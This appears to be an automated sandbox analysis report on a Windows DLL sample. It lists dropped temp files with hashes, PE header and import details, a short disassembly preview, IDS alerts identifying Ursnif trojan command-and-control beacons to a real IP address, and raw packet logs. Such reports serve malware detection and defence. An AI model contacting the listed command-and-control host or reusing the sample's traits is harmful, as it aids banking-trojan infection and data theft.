                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DF9E3497B6790C0EC4.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29745
                                        Entropy (8bit):0.2920107282763179
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFA7967BC6A9057EC8.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39729
                                        Entropy (8bit):0.5904464620891627
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFB1A75A66147A77CF.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.3142129947050807
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFC075B193E8936012.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39809
                                        Entropy (8bit):0.605449517339683
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFC73AC009E2BBD270.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39681
                                        Entropy (8bit):0.5802800074311916
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFCC71BE5E716F720A.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):34405
                                        Entropy (8bit):4.029028348951458
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFD3D6CAB802D0CCCD.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.314037824825452
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFE1BE5ABC77A13206.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39713
                                        Entropy (8bit):0.5834692308611003
                                        Encrypted:false
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFE6B7C6A48405F49F.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):25657
                                        Entropy (8bit):0.31421299470508074
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwlp9lwlSc9l2lg:kBqoxKAuvScS+lKlslg
                                        MD5:0720C8977C766E59A550CE403F022B65
                                        SHA1:EBE3A7D2167C531F91B9FAE9308E6B9678050BC8
                                        SHA-256:1AF6F2FE2A17FB1C6EF269E4D2D4793FC3C2AA203889BCCCB98CB1F422E1D25B
                                        SHA-512:CD2EECE2DD857952817982DDACD4AD4E22EF51AD6FDBCD5E9C7245BA6118535CCDA29774B7ECFE3CD92AA1E0BF46BA3A5C1EAA9EA233A0C7A90C108E62F68A8E
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFEAC6A4A8E15E0827.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):39785
                                        Entropy (8bit):0.6008413991535659
                                        Encrypted:false
                                        SSDEEP:96:kBqoxKAuvScS+djBgDl33Vya33VyW33Vy3:kBqoxKAuqR+djBgDl3FN3F93FC
                                        MD5:9D2C78564EFCB7095F40B69CD408E4B8
                                        SHA1:F60D6FFB70478C05339EFC359E1A9E9CF683B92D
                                        SHA-256:D480D7E9720CED1A2BD78B1ED37509556FE0CA74DE826FD3C0A910544902A628
                                        SHA-512:B462F01202CCED26B89EB2627FD77EA3D6F830E70B88BED5CEAFBF10899F3266F8CAB9AE6C8211C7414C0AB76E1175A926435C967FBA586E915AB655293E7D2B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFF4DCF86439985E24.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):360170
                                        Entropy (8bit):3.3037967258062184
                                        Encrypted:false
                                        SSDEEP:3072:dZ/2Bfcdmu5kgTzGtUZ/2Bfc+mu5kgTzGtTZ/2Bfcdmu5kgTzGtYZ/2Bfc+mu5kn:Ej9X
                                        MD5:C432DBB58C345DC7E1FF1E5368331B90
                                        SHA1:35BAD100C58E6E82E0646A964F1F31A284A7E5BE
                                        SHA-256:8864EF06CE6C7188FAE62F7A69687CFA90A7228E9AA714329909F7D637310F99
                                        SHA-512:C03E0771275B77EC65A2CFDC01119CE8AB15872B2573CCFE2F79CE18308B058833CD440AB19876E59CD6C0892A8733437BCC074A5C99F8027FAB02C2F6EDFA20
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFF8C29B41D0333340.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29989
                                        Entropy (8bit):0.3300716355381773
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwY9lwTc9l2u/9l2m9lq:kBqoxKAuvScS+LFu+bKy
                                        MD5:8EF6E3E282D3DB4EF627A0D06977A08F
                                        SHA1:D888834FBFFBEE3D0E869998512681BF5784577E
                                        SHA-256:CCA7C3C50A1C5F933532E9DF75B4B3F13C711096F9ECB0FC4CF753E97ED976B3
                                        SHA-512:DB74043BB786D64EE5D5F94D10493BD6D010D72450F026BECA87B48245FA04B4575EE47C373EEFAA23C6C4E7AC7253356F07F53D89340B2881E5F26478F0D9EB
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Local\Temp\~DFFF4B8C6476358DC0.TMP
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):29989
                                        Entropy (8bit):0.33092728525249876
                                        Encrypted:false
                                        SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lw29lwBc9l2A/9l2o9l0:kBqoxKAuvScS+5XA+pIy
                                        MD5:F5B646DF1A45E238C6984EFC961F766A
                                        SHA1:26B90B1B1859E4B7946C2F256E3DDFF739882A67
                                        SHA-256:9EB88E791A2E776E2CE7FA209820E1E7D8ABB9B5B6AC9E7DB433B4F01F2F0FA5
                                        SHA-512:A9A9838147B1963CD63A15041F8690853453A7EA15D8605FBE21C7CAA6467BF5C3AABE11BE1131718191EE1D3B785CA14CDAB85B395F8D8E003B102817A0A29E
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\28c8b86deab549a1.customDestinations-ms (copy)
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5149
                                        Entropy (8bit):3.181971138323255
                                        Encrypted:false
                                        SSDEEP:48:cdi4PjIPC9GrIoSAsASFPdi4PjIPh683GrIoSAczcdi4PjIPx9GrIoSAV1H:IPjp9SyAJmPjy3SyADPj69SyAf
                                        MD5:3B3608B7EF553C5524A67C009EF22A08
                                        SHA1:09480675F1A2CFCB2429DA78DD33C73BCB079954
                                        SHA-256:DAC736E995D36B35CA19ACDEC04480E5D7E2F453D6CE88827835FECA06512B47
                                        SHA-512:B23CDE6CA3D58B9DB3F96F04214E5A93E1EE35E0B3F1207C72FAF69A25901A8E9683CEF1870AF9A609E420F602EA0EE4DBA12BB1E4C8587E6FD137927A41893B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J5UJVFQ4YINQKL7HOEIX.temp
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5149
                                        Entropy (8bit):3.181971138323255
                                        Encrypted:false
                                        SSDEEP:48:cdi4PjIPC9GrIoSAsASFPdi4PjIPh683GrIoSAczcdi4PjIPx9GrIoSAV1H:IPjp9SyAJmPjy3SyADPj69SyAf
                                        MD5:3B3608B7EF553C5524A67C009EF22A08
                                        SHA1:09480675F1A2CFCB2429DA78DD33C73BCB079954
                                        SHA-256:DAC736E995D36B35CA19ACDEC04480E5D7E2F453D6CE88827835FECA06512B47
                                        SHA-512:B23CDE6CA3D58B9DB3F96F04214E5A93E1EE35E0B3F1207C72FAF69A25901A8E9683CEF1870AF9A609E420F602EA0EE4DBA12BB1E4C8587E6FD137927A41893B
                                        Malicious:false
                                        Reputation:unknown
                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UEENZ8WXGL39Z9ZV0CBQ.temp
                                        Process:C:\Program Files\internet explorer\iexplore.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5149
                                        Entropy (8bit):3.181971138323255
                                        Encrypted:false
                                        SSDEEP:48:cdi4PjIPC9GrIoSAsASFPdi4PjIPh683GrIoSAczcdi4PjIPx9GrIoSAV1H:IPjp9SyAJmPjy3SyADPj69SyAf
                                        MD5:3B3608B7EF553C5524A67C009EF22A08
                                        SHA1:09480675F1A2CFCB2429DA78DD33C73BCB079954
                                        SHA-256:DAC736E995D36B35CA19ACDEC04480E5D7E2F453D6CE88827835FECA06512B47
                                        SHA-512:B23CDE6CA3D58B9DB3F96F04214E5A93E1EE35E0B3F1207C72FAF69A25901A8E9683CEF1870AF9A609E420F602EA0EE4DBA12BB1E4C8587E6FD137927A41893B
                                        Malicious:false
                                        Reputation:unknown

                                        Static File Info

                                        General

                                        File type:MS-DOS executable, MZ for MS-DOS
                                        Entropy (8bit):6.251166232775736
                                        TrID:
                                        • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                        • Generic Win/DOS Executable (2004/3) 0.20%
                                        • DOS Executable Generic (2002/1) 0.20%
                                        • VXD Driver (31/22) 0.00%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:MGrYFpGLQ7.dll
                                        File size:136704
                                        MD5:8c7b2ff105963718fa3c26989e206041
                                        SHA1:831ece0ae6b5e2f373f75352e582abd61b5dd0d7
                                        SHA256:90d8648b2aac0c837286a4c042f02064cfbb12f45b3dc6b00b2beccc7fc35422
                                        SHA512:4a2c9b3ce6d2548660189aa247020c9e19127c57fb50859e36f61ea25c9f84ca792820898fae16fb172e1171e02172081f01c1b9b1946daa1310f6a6097e8f13
                                        SSDEEP:3072:0aWbgDTa51CF1J27oLaPfdWeu0JMNzfpodOCwdAf4:0XMDdJ2hPIeBCj
                                        File Content Preview:MZ......................................................................!..L.!This -7Afram cannot be run in DOS mode....$.......PE..L..................!................>A............@..................................G..............................e......

                                        File Icon

                                        Icon Hash:74f0e4ecccdce0e4

                                        Static PE Info

                                        General

                                        Entrypoint:0x40413e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:
                                        Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:3c5ce00825859dda51eb5de893c2c46c

                                        Entrypoint Preview

                                        Instruction
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 48h
                                        push esi
                                        push 00000022h
                                        push 0040E6E8h
                                        push 00000001h
                                        call dword ptr [0040D144h]
                                        mov dword ptr [ebp-38h], eax
                                        push 00000015h
                                        push dword ptr [00422244h]
                                        push FFFFFF84h
                                        call 00007F012CE2FD6Dh
                                        add esp, 0Ch
                                        push 0000005Dh
                                        push FFFFFFD5h
                                        push 00000005h
                                        push dword ptr [00422244h]
                                        push FFFFFFDBh
                                        push 0000003Ch
                                        push FFFFFFE9h
                                        call 00007F012CE314E8h
                                        push FFFFFFB3h
                                        push dword ptr [00422244h]
                                        push eax
                                        call 00007F012CE2F430h
                                        mov edx, 00000066h
                                        add edx, dword ptr [00422254h]
                                        sub edx, 7Eh
                                        mov dword ptr [ebp-24h], edx
                                        push 0000003Bh
                                        push FFFFFFC3h
                                        push 00000054h
                                        jmp 00007F012CE32D78h
                                        add edi, esi
                                        rol esi, 0Bh
                                        not edx
                                        add edi, esi
                                        add edx, esi
                                        add edx, ebp
                                        lea edi, dword ptr [edx+6B901122h]
                                        int3
                                        push eax
                                        ret
                                        jne 00007F012CE30126h
                                        or edi, eax
                                        mov eax, dword ptr [ecx]
                                        add edi, dword ptr [esp+40h]
                                        add ecx, dword ptr [esp+58h]
                                        mov ecx, edi
                                        ret
                                        call dword ptr [0040A04Ch]
                                        not edi
                                        mov eax, esi
                                        mov dword ptr [esp+24h], ecx
                                        pop ecx
                                        int3
                                        and ecx, edi
                                        mov ecx, ebx
                                        add eax, ebx
                                        mov eax, dword ptr [eax]
                                        mov eax, edi
                                        mov dword ptr [0040D2E4h], eax
                                        mov esi, edi
                                        add edx, esi
                                        test ebx, ebx
                                        add dword ptr [ebp+000000A4h], ecx
                                        add ebx, ebp
                                        int3
                                        push 00000000h

                                        Data Directories

                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0xa665           0xfc          .text
                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0xbdc8           0x2e4         .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x2b000          0x994         .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_IAT             0xd000           0x440         .rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                        Sections

                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type                            Entropy        Characteristics
                                        .text   0x1000           0xb0ac        0xb200    False     0.587671172753   data                                 6.63369052343  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata  0xd000           0x440         0x600     False     0.302734375      DOS executable (COM, 0x8C-variant)   2.79332490305  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data   0xe000           0x1c43a       0x14400   False     0.654079861111   data                                 5.49862585867  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .reloc  0x2b000          0x994         0xa00     False     0.833984375      data                                 6.65585202764  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Imports

                                        DLL           Import
                                        advapi32.dll  AllocateAndInitializeSid, RegCreateKeyExW, RegDeleteValueW, FreeSid, RegQueryValueExW, RegOpenKeyExW, RegCloseKey, RegSetValueExW, CheckTokenMembership
                                        amstream.dll  DllCanUnloadNow
                                        crypt32.dll   CertGetCertificateChain, CertFreeCertificateContext, CryptQueryObject, CryptMsgClose, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CryptMsgGetAndVerifySigner, CryptHashPublicKeyInfo, CryptDecodeObject, CryptMsgGetParam, CertCloseStore
                                        dsauth.dll    DhcpDsCleanupDS
                                        gdi32.dll     CreateFontIndirectW, GetObjectW
                                        hnetcfg.dll   HNetDeleteRasConnection
                                        iernonce.dll  RunOnceExProcess
                                        kbdbene.dll   KbdLayerDescriptor
                                        kbdbu.dll     KbdLayerDescriptor
                                        kbdes.dll     KbdLayerDescriptor
                                        kbdgae.dll    KbdLayerDescriptor
                                        kbdhe319.dll  KbdLayerDescriptor
                                        kernel32.dll  WideCharToMultiByte, UnhandledExceptionFilter, SetEvent, GetSystemTime, InterlockedIncrement, Sleep, CreateFileW, LoadLibraryExW, DelayLoadFailureHook, CreateDirectoryW, GetTempPathW, GetCurrentThreadId, GetFileAttributesW, SetFileTime, GetUserDefaultUILanguage, CreateWaitableTimerW, GetLastError, GetTickCount, QueryPerformanceCounter, GetStartupInfoA, CreateFileMappingW, GetCurrentProcessId, CloseHandle, LeaveCriticalSection, CancelWaitableTimer, TerminateProcess, InterlockedDecrement, UnmapViewOfFile, InterlockedCompareExchange, InitializeCriticalSection, LoadResource, LoadLibraryW, GetSystemDefaultUILanguage, GetNativeSystemInfo, VirtualProtect, GetFileTime, FindResourceW, HeapSetInformation, GetModuleFileNameW, MoveFileExW, LoadLibraryA, GetThreadLocale, InterlockedExchange, GetCurrentProcess, FileTimeToLocalFileTime, FormatMessageW, GetModuleHandleW, MapViewOfFile, CreateMutexW, MultiByteToWideChar, CreateEventW, SetUnhandledExceptionFilter, SearchPathW, LocalFree, LocalAlloc, GetExitCodeProcess, DeleteFileW, GetProcAddress, EnterCriticalSection, FreeLibrary, FindResourceExW, lstrcmpA, SetLastError, GetVersion, SetWaitableTimer, GetVersionExW, GetModuleHandleA, OutputDebugStringA, GetSystemDirectoryW, DeleteCriticalSection, ReleaseMutex, WaitForSingleObject
                                        loadperf.dll  UnloadPerfCounterTextStringsW
                                        lpk.dll       LpkGetCharacterPlacement
                                        mcicda.dll    DriverProc
                                        mprapi.dll    MprConfigInterfaceDelete
                                        msafd.dll     WSPStartup
                                        msdmo.dll     MoFreeMediaType
                                        msisip.dll    DllRegisterServer
                                        msvcrt.dll    __CxxFrameHandler, strcspn, _ultow, ___lc_handle_func, __crtGetStringTypeW, bsearch, _cexit, _controlfp, __set_app_type, abort, wctomb, _write, __pctype_func, malloc, ___lc_codepage_func, ___mb_cur_max_func, exit, _acmdln, ferror, wcsncmp, wcsrchr, _vsnwprintf, __setusermatherr, _lock, _lseeki64, _onexit, mbtowc, __RTDynamicCast, __crtLCMapStringW, __pioinfo, __uncaught_exception, _wtoi, _itoa, _errno, _wcsnicmp, memcpy, iswspace, setlocale, __badioinfo, _initterm, _callnewh, _amsg_exit, localeconv, _unlock, _XcptFilter, memmove, _CxxThrowException, __mb_cur_max, _wcsicmp, isleadbyte, _snprintf, __getmainargs, _iob, _isatty, _purecall, memchr, _fileno, _ltow, _beginthreadex, __dllonexit, free, _waccess, _ismbblead, _exit, memset
                                        ntdll.dll     RtlUnwind
                                        ole32.dll     StringFromCLSID, CoRevokeClassObject, CoUninitialize, CLSIDFromString, CoInitializeEx, CoInitializeSecurity, CoRegisterClassObject, CoCreateInstance, CoTaskMemFree
                                        opengl32.dll  glLoadMatrixf
                                        rasdlg.dll    RasUserEnableManualDial
                                        scrobj.dll    DllUnregisterServerEx
                                        scrrun.dll    DllRegisterServer
                                        serialui.dll  drvGetDefaultCommConfigW
                                        shell32.dll   Shell_NotifyIconW, ShellExecuteExW
                                        shlwapi.dll   PathFindExtensionW, AssocQueryStringW
                                        termmgr.dll   DllUnregisterServer
                                        urlmon.dll    CoInternetParseUrl, URLDownloadToCacheFileW, CoInternetCombineUrl
                                        user32.dll    GetClipboardData, MessageBoxW, SendDlgItemMessageW, GetSystemMetrics, OffsetRect, GetParent, DialogBoxParamW, GetSubMenu, PostThreadMessageW, DefWindowProcW, GetIconInfo, GetDesktopWindow, GetCursorPos, RegisterClassW, LoadIconW, PostQuitMessage, UnregisterClassW, DestroyWindow, EnableMenuItem, DispatchMessageW, LoadMenuW, TrackPopupMenu, LoadStringW, SetWindowPos, LoadImageW, CreateWindowExW, EndDialog, GetWindowRect, TranslateMessage, GetMessageW, CopyRect, SendMessageW, SetWindowTextW, SetForegroundWindow, DestroyMenu
                                        wdigest.dllSpInstanceInit
                                        wintrust.dllWinVerifyTrust
                                        wshtcpip.dllWSHSetSocketInformation

                                        Exports

                                        Name | Ordinal | Address
                                        Bighearted | 1 | 0x402440
                                        Soaking | 2 | 0x40289c
                                        Turnipy | 3 | 0x403499
                                        Watertight | 4 | 0x403dae
                                        Dithery | 5 | 0x40413e
                                        Anhimae | 6 | 0x404662
                                        Anostraca | 7 | 0x405543
                                        DllRegisterServer | 8 | 0x40d358
                                        Anaerobian | 9 | 0x40618b
                                        Sparsile | 10 | 0x407496
                                        DllUnregisterServer | 11 | 0x40d380

                                        Network Behavior

                                        Snort IDS Alerts

                                        Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                        09/10/21-11:34:16.615251 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49859 | 80 | 192.168.2.5 | 13.225.29.132
                                        09/10/21-11:34:16.615251 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49859 | 80 | 192.168.2.5 | 13.225.29.132
                                        09/10/21-11:34:19.499046 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49863 | 80 | 192.168.2.5 | 13.225.29.132
                                        09/10/21-11:34:43.724298 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49907 | 80 | 192.168.2.5 | 13.225.29.132
                                        09/10/21-11:34:43.724298 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49907 | 80 | 192.168.2.5 | 13.225.29.132
                                        09/10/21-11:35:30.222900 | ICMP | 399 | ICMP Destination Unreachable Host Unreachable | | | 10.200.16.217 | 192.168.2.5

                                        Network Port Distribution

                                        TCP Packets

                                        Sep 10, 2021 11:33:46.354218960 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354258060 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354263067 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354269028 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354302883 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354346037 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354348898 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354350090 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354363918 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354418039 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354423046 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354469061 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354477882 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354495049 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354557037 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354562044 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354566097 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354617119 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354659081 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354660034 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354664087 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354672909 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354722023 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354727030 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354731083 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354779959 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354819059 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354824066 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354830027 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354834080 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354882002 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354885101 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354886055 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354901075 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354962111 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354964972 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.354965925 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.354979038 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355036020 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355041027 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355045080 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355088949 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355133057 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355142117 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355149031 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355190992 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355231047 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355232000 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355235100 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355243921 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355293036 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355297089 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355300903 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355344057 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355381966 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355386019 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355390072 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355393887 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355446100 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355451107 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355457067 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355469942 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355530977 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355535984 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355540037 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355595112 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355596066 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355611086 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355669975 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355675936 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355679989 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355691910 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355743885 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355753899 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355757952 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355770111 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355801105 CEST49820443192.168.2.587.248.118.22
                                        Sep 10, 2021 11:33:46.355837107 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355874062 CEST4434982087.248.118.22192.168.2.5
                                        Sep 10, 2021 11:33:46.355880022 CEST49820443192.168.2.587.248.118.22
